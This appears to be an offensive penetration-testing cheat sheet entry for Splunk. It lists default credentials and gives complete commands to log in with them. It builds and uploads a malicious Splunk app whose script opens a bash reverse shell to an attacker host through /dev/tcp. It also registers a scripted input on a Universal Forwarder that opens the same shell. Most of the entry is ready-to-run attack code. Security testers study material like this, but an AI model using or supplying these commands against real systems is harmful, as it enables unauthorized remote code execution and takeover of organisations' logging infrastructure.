Splunk
What it is: Enterprise SIEM and log analysis platform. The management interface allows installing custom apps, which can contain arbitrary Python or shell scripts. Admin access = RCE.
Default ports: 8000 (web), 8089 (management API)
Vuln research:
Default credentials
Splunk free/trial often has defaults
# admin:changeme
# admin:admin
curl -u admin:changeme https://$IP:8089/services/auth/login -k
Splunk RCE via custom app
Upload malicious app — Executes arbitrary code
# Create a malicious Splunk app:
mkdir -p splunk_shell/bin splunk_shell/default
echo '#!/bin/bash\nbash -i >& /dev/tcp/$LHOST/4444 0>&1' > splunk_shell/bin/shell.sh
chmod +x splunk_shell/bin/shell.sh
cat > splunk_shell/default/inputs.conf << CONF
[script://./bin/shell.sh]
disabled = false
interval = 60
sourcetype = shell
CONF
tar -czf splunk_shell.tar.gz splunk_shell/
# Upload via: Apps → Manage Apps → Install App from File
# Or via API:
curl -k -u admin:changeme https://$IP:8089/services/apps/local -F name=splunk_shell -F filename=true -F update=true --data-binary @splunk_shell.tar.gz
Splunk Universal Forwarder
Management port 8089 — Often has default creds on forwarders
# Default: admin:changeme
# Forwarders can execute scripts:
curl -k -u admin:changeme https://$IP:8089/services/data/inputs/script -d name="/bin/bash -c 'bash -i >& /dev/tcp/$LHOST/4444 0>&1'" -d interval=60